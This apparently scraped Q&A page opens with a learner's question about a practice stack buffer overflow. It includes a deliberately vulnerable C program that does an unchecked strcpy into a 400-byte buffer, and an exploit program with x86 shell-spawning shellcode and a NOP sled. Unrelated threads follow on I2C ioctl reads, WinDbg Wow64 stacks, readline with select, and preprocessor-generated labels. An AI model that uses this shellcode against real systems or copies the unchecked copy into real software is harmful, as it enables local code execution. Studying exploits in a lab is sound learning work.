I've been practicing some basic stack-based buffer overflow task recently
and I wrote an vulnerable program like this:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(int argc,char **argv)
{
if (argc<2) {
puts("Need enough args!!");
exit(0);
}
char buf[400];
strcpy(buf,argv[1]);
printf("Hi, %s\n",buf);
return 0;
}
and the exploit program like this:
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#define ATK_L 430
#define VUL_L 400
#define NOP_L 12
int main(){
char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73"
"\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x89\xc1\x89\xc2\xb0\x0b"
"\xcd\x80\x31\xc0\x40\xcd\x80";
char *atk,vul[]="./vul1 ";
atk=(char*)malloc(sizeof(char)*ATK_L);
unsigned long i,ret,*ptr,ptr2;
ret=(unsigned long)atk;
ptr=(unsigned long*)atk;
for(i=0;i<ATK_L;i+=4){
*(ptr++)=ret;
}
for(i=0;i<NOP_L;i++){
atk[i]='\x90';
}
ptr2=0;
for(i=NOP_L;i<NOP_L+strlen(shellcode);i++){
atk[i]=shellcode[ptr2++];
}
atk[ATK_L-1]='\0';
strcat(vul,atk);
system(vul);
free(atk);
return 0;
}
Since I don't want to determine the offset , I just jump back to the beginning of the atk array . I turn off the ASLR & put the -fno-stack-protector flag when compiling , but when I run the exploit program it just say core dump and do nothing!! I use gdb to debug the exploit program and it said that it was killed in the getenv function and I just cant get understand.
I work on ubuntu 11.10 32bits
Thanks a lot :-)
Related
Here is my program:
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <unistd.h>
#include <err.h>
#include <errno.h>
#include <linux/types.h>
#include <linux/i2c.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define I2C_SLAVE 0x0703
int main(int argc, char **argv)
{
uint8_t data, i2c_device_address = 0x21,
i2c_register_address = 0x01;
int file, rc;
//Open I2C
file = open("/dev/i2c-1", O_RDWR);
if (file < 0)
err(errno, "Tried to open /dev/i2c-1");
// I want to work with I2C Register at I2C Address 0x12
rc = ioctl(file, I2C_SLAVE, i2c_register_address);
if (rc < 0)
err(errno, "Tried to set device address '0x%02x'",
i2c_device_address);
// Read Content of I2C Register at I2C Address 0x12
rc = read(file, &data, 1);
if (rc < 0)
err(errno, "Tried to read device at address '0x%02x'",
i2c_device_address);
// Print the Result
// Expected (Default) Value = 0x80
// What i got = 0x00
printf("/dev/i2c-1: device 0x%02x at address 0x%02x: 0x%02x\n",
i2c_device_address, i2c_register_address, data);
// Terminal Output:
// /dev/i2c-1: device 0x21 at address 0x01: 0x00
return 0;
}
I have the ov7670 camera and i am trying to read some registers for warm up.
But i always get the same result: 0x00.
The datasheet of the camera tells me that 0x80 is the default value for this register.
When my camera isn't even connected to my Raspberry PI it still prints the same output when i run my program. There are not even errors.
I used the command i2cdetect -r 1 and i got correct output.
So the device must be ok and properly connected.
I want to know how can i read and write to i2c registers with the basic Linux read, write & ioctl functions?
UPDATE
Now I check the return value of the read function and it says Remote I/O error
The ioctl takes the device address as the third parameter, not the register:
rc = ioctl(file, I2C_SLAVE, i2c_device_address);
Then, you need a write-read combination, first writing the register you want to read then do the read.
And you have to check the return value of the read. It needs to be 1 or the read failed.
I'm trying to understand why this program return different errors when I change the size of the buffer:
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
int main()
{
int file = open("./test",O_RDWR);
//char buff[204796] = "" ; -> File Descriptor error (no seg fault)
//char buff[100000]=""; -> Seg Fault
char buff[208896]=""; -> Bad Adress (no seg fault)
int i = 0;
while(read(file,buff+i,2048) > 0)
{
i += 2048;
};
fprintf(stderr, "%s\n", strerror(errno));
}
Test is a file with 500000 A :)
When a Bad adress or File descriptor errors occur, I don't know how to exploit this code.
So, bad access and segfaults aren't the same category. Bad access is thrown by the Mach-o system, while segfault is a POSIX signal, hence, segfault ∈ bad access (it can be thrown by other POSIX signals. I would suspect your error is stemming from your file size, and or the OS blocking you from taking that much memory. Look at your memory at the locations in the dump and see what is stored.
Below is my program and I am trying to get the call stack when the process is blocked in WaitForSingleObject() call using windbg. The strange thing is when the process is blocking, windbg only prints out very strange stack.
wow64cpu!TurboDispatchJumpAddressEnd+0x690
wow64cpu!TurboDispatchJumpAddressEnd+0x484
wow64!Wow64SystemServiceEx+0x1ce
wow64!Wow64LdrpInitialize+0x429
ntdll!RtlResetRtlTranslations+0x1b08
ntdll!RtlResetRtlTranslations+0xc63
ntdll!LdrInitializeThunk+0xe
// process2.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include "windows.h"
HANDLE g_hWriteEvent;
int _tmain(int argc, _TCHAR* argv[])
{
g_hWriteEvent = OpenEvent(
EVENT_ALL_ACCESS,
FALSE,
TEXT("WriteEvent")
);
if (g_hWriteEvent == NULL) {
printf("OpenEvent error (%d)\n", GetLastError());
return 0;
}
// while (1);
WaitForSingleObject(g_hWriteEvent, INFINITE);
return 0;
}
Note that if I uncomment the while(1) line then the windbg can recognize the process is blocking in the _tmain function.
Thanks.
Bin
Looks like that is a Wow64 32 bit process running on 64 bit OS. Make sure you attach the 64 bit Windbg to the process, not the 32 bit Windbg.
I have stdin in a select() set and I want to take a string from stdin whenever the user types it and hits Enter.
But select is triggering stdin as ready to read before Enter is hit, and, in rare cases, before anything is typed at all. This hangs my program on getstr() until I hit Enter.
I tried setting nocbreak() and it's perfect really except that nothing gets echoed to the screen so I can't see what I'm typing. And setting echo() doesn't change that.
I also tried using timeout(0), but the results of that was even crazier and didn't work.
What you need to do is tho check if a character is available with the getch() function. If you use it in no-delay mode the method will not block. Then you need to eat up the characters until you encounter a '\n', appending each char to the resulting string as you go.
Alternatively - and the method I use - is to use the GNU readline library. It has support for non-blocking behavior, but documentation about that section is not so excellent.
Included here is a small example that you can use. It has a select loop, and uses the GNU readline library:
#include <stdio.h>
#include <readline/readline.h>
#include <readline/history.h>
#include <stdlib.h>
#include <stdbool.h>
int quit = false;
void rl_cb(char* line)
{
if (NULL==line) {
quit = true;
return;
}
if(strlen(line) > 0) add_history(line);
printf("You typed:\n%s\n", line);
free(line);
}
int main()
{
struct timeval to;
const char *prompt = "# ";
rl_callback_handler_install(prompt, (rl_vcpfunc_t*) &rl_cb);
to.tv_sec = 0;
to.tv_usec = 10000;
while(1){
if (quit) break;
select(1, NULL, NULL, NULL, &to);
rl_callback_read_char();
};
rl_callback_handler_remove();
return 0;
}
Compile with:
gcc -Wall rl.c -lreadline
I'm writing a bunch of related preprocessor macros, one of which generates labels which the other one jumps to. I use them in this fashion:
MAKE_FUNNY_JUMPING_LOOP(
MAKE_LABEL();
MAKE_LABEL();
)
I need some way to generate unique labels, one for each inner MAKE_LABEL call, with the preprocessor. I've tried using __LINE__, but since I call MAKE_LABEL inside another macro, they all have the same line and the labels collide.
What I'd like this to expand to is something like:
MAKE_FUNNY_JUMPING_LOOP(
my_cool_label_1: // from first inner macro
...
my_cool_label_2: // from second inner macro
...
)
Is there a way to generate hashes or auto-incrementing integers with the preprocessor?
If you're using GCC or MSVC, there is __COUNTER__.
Other than that, you could do something vomit-worthy, like:
#ifndef USED_1
#define USED_1
1
#else
#ifndef USED_2
#define USED_2
2
/* many many more */
#endif
#endif
I use this:
#define MERGE_(a,b) a##b
#define LABEL_(a) MERGE_(unique_name_, a)
#define UNIQUE_NAME LABEL_(__LINE__)
int main()
{
int UNIQUE_NAME = 1;
return 0;
}
... and get the following:
int main()
{
int unique_name_8 = 1;
return 0;
}
As others noted, __COUNTER__ is the easy but nonstandard way of doing this.
If you need extra portability, or for other cool preprocessor tricks, the Boost Preprocessor library (which works for C as well as C++) will work. For example, the following header file will output a unique label wherever it's included.
#include <boost/preprocessor/arithmetic/inc.hpp>
#include <boost/preprocessor/slot/slot.hpp>
#if !defined(UNIQUE_LABEL)
#define UNIQUE_LABEL
#define BOOST_PP_VALUE 1
#include BOOST_PP_ASSIGN_SLOT(1)
#undef BOOST_PP_VALUE
#else
#define BOOST_PP_VALUE BOOST_PP_INC(BOOST_PP_SLOT(1))
#include BOOST_PP_ASSIGN_SLOT(1)
#undef BOOST_PP_VALUE
#endif
BOOST_PP_CAT(my_cool_label_, BOOST_PP_SLOT(1)):
Sample:
int main(int argc, char *argv[]) {
#include "unique_label.h"
printf("%x\n", 1234);
#include "unique_label.h"
printf("%x\n", 1234);
#include "unique_label.h"
return 0;
}
preprocesses to
int main(int argc, char *argv[]) {
my_cool_label_1:
printf("%x\n", 1234);
my_cool_label_2:
printf("%x\n", 1234);
my_cool_label_3:
return 0;
}
I can't think of a way to automatically generate them but you could pass a parameter to MAKE_LABEL:
#define MAKE_LABEL(n) my_cool_label_##n:
Then...
MAKE_FUNNY_JUMPING_LOOP(
MAKE_LABEL(0);
MAKE_LABEL(1);
)
You could do this:
#define MAKE_LABEL() \
do { \
my_cool_label: \
/* some stuff */; \
goto my_cool_label; \
/* other stuff */; \
} while (0)
This keeps the scope of the label local, allowing any number of them inside the primary macro.
If you want the labels to be accessed more globally, it's not clear how your macro "MAKE_FUNNY_JUMPING_LOOP" references these labels. Can you explain?
It doesn't seem possible with a standard preprocessor, although you could fake it out by putting parameters within MAKE_LABEL or MAKE_FUNNY_JUMPING_LOOP, and use token pasting to create the label.
There's nothing preventing you from making your own preprocessing script that does the automatic increment for you. However, it won't be a standard C/C++ file in that case.
A list of commands available: http://www.cppreference.com/wiki/preprocessor/start